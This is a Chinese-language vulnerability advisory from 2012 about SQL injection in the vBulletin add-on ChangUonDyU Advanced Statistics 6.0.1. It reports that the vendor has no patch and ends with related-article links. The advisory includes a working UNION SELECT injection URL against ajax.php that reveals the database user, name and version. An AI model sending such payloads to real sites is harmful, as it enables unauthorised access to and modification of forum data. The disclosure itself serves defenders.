VBulletin ChangUonDyU - Advanced Statistics SQL注入漏洞

发布日期：2012-11-02
更新日期：2012-11-06受影响系统：
hoiquantinhoc ChangUonDyU - Advanced Statistics 6.0.1
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 56379

vBulletin是一个强大灵活并可完全根据自己的需要定制的论坛程序套件。

ChangUonDyU - Advanced Statistics 6.0.1及其他版本存在SQL注入漏洞，攻击者可利用此漏洞控制应用、访问或修改数据、利用下层数据库内的其他漏洞。

<*来源：Juno_okyo

链接：http://www.exploit-db.com/exploits/22429/
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
http://www.example.com/f/ajax.php？do=inforum&amp;listforumid=100%29%20UNION%20SELECT%201,concat_ws%280x7c,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10--%20-&amp;result=20建议：
--------------------------------------------------------------------------------
厂商补丁：

hoiquantinhoc
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.htmlqdPM v7任意PHP文件上传漏洞Pattern Insight多个安全漏洞相关资讯 SQL注入漏洞 vBulletin安全漏洞 vBulletin

vBulletin decodeArguments（）方法（11/12/2015 13:37:25）
vBulletin SQL注入漏洞（07/18/2014 15:44:44）
已经 14 岁的 SQL 注入仍然是最危（08/29/2013 13:12:18）

vBulletin "cat"参数SQL注入漏洞（09/04/2014 17:23:13）
vBulletin index.php/ajax/api/ （12/14/2013 08:37:16）
vbBux及vbPlaza "vbplaza_lottery_ （08/13/2013 19:24:57）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规